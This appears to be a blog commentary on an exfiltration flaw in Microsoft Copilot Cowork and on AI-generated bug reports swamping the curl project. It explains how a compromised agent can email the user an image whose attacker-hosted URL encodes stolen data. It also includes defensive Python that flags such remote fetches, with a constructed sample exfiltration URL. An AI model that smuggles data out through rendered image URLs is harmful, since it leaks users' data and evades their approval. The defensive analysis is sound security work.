Microsoft Copilot Cowork has a data exfiltration problem. Yes, that’s the actual product name.
The issue, flagged by Simon Willison, shows how tricky it is to lock down agentic systems. Copilot Cowork can send emails to the user’s own inbox without asking for approval. That sounds merely annoying until you consider what happens next: those messages can contain external images that trigger network requests when rendered.
An attacker who’s compromised the agent doesn’t need to get data out directly. They just need to get the agent to email the user, embed an image hosted on an attacker-controlled server, and encode the stolen data in the image URL. When the email client renders the message, it makes the request, and the data walks right out.
This is the kind of vulnerability that makes security teams wince. It’s not a dramatic exploit. It’s a design flaw that turns a convenience feature into an exfiltration channel.
The attack surface here is larger than it looks. Email rendering is complex, image prefetching is common, and users expect their own AI assistant to be helpful, so they don’t vet its messages the way they would external input. The combination creates a trust boundary violation that’s hard to spot and harder to defend against.
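One way to narrow the channel described above is to let the agent send mail without approval only when the body contains nothing a mail client would fetch from an unapproved host. The Python below is an added example, not code from Microsoft or from the original report; the allowlisted host, the function names and the sample bodies are assumptions constructed for illustration, and it inspects tag attributes and inline styles only.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: the only host allowed to serve images in agent mail (constructed).
ALLOWED_IMAGE_HOSTS = {"static.corp.example"}
FETCH_ATTRS = {"src", "srcset", "background", "poster"}
CSS_URL = re.compile(r"url\(\s*['\"]?([^'\")\s]+)", re.I)

class RemoteFetchFinder(HTMLParser):
    """Collects every URL a mail client could fetch while rendering the body."""
    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if not value:
                continue
            if name in FETCH_ATTRS:
                # srcset holds comma-separated "url descriptor" pairs
                parts = value.split(",") if name == "srcset" else [value]
                self.urls += [p.split()[0] for p in parts if p.strip()]
            elif name == "style":
                self.urls += CSS_URL.findall(value)

def remote_fetches(html_body):
    """Return (url, host) for each auto-loaded resource outside the allowlist."""
    finder = RemoteFetchFinder()
    finder.feed(html_body)
    finder.close()
    hits = []
    for url in finder.urls:
        parts = urlsplit(url.strip())
        # "//host/x" is scheme-relative and still triggers an outbound request;
        # cid: and data: references have no network location and are skipped.
        if parts.scheme in ("http", "https", "") and parts.netloc:
            host = (parts.hostname or "").lower()
            if host not in ALLOWED_IMAGE_HOSTS:
                hits.append((url, host))
    return hits

def may_send_without_approval(html_body):
    """Policy gate: agent mail with off-allowlist fetches needs a human."""
    return not remote_fetches(html_body)

# Constructed sample bodies, not taken from any real incident.
BENIGN = '<p>Summary.</p><img src="cid:logo"><img src="https://static.corp.example/l.png">'
SUSPECT = '<p>Done.</p><img src="https://collector.example/p.gif?d=Q1-revenue-draft">'
```

A body that fails the gate can be held for user approval or delivered as plain text, and the returned host list is worth logging as a detection signal.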
Meanwhile, Daniel Stenberg and the curl team are dealing with a different kind of AI pressure. The rate of incoming security reports has quadrupled since 2024 and doubled since last year. They’re now getting more than one report per day.
The reports aren’t junk. They’re detailed, credible, and time-consuming to triage. The quality is higher than ever before, which means each one demands serious attention.
This is what happens when AI gets good at finding bugs but doesn’t get proportionally better at understanding context or severity. The tooling lowers the barrier to filing reports, but the human work of evaluating them doesn’t compress. Stenberg notes that for the first time, his wife has commented on the pressure he’s under.
Open source maintainers are already stretched thin. Adding a 4-5x multiplier on security triage without adding resources isn’t sustainable. The curl project is high-profile and critical infrastructure, which makes it a magnet for this kind of attention. But the pattern will spread.
If AI-assisted security research keeps scaling at this rate, we’re going to need AI-assisted triage just to keep up. Or we need to rethink how we fund and staff the projects that everything else depends on.
Both stories point to the same underlying issue: AI is changing the economics of security work, and we haven’t adapted yet.
Copilot Cowork shows that building agentic systems without thinking through every trust boundary is going to hurt. The curl situation shows that democratizing security research without democratizing maintenance capacity is going to hurt too.
Neither problem has an obvious fix. But ignoring them isn’t going to work either.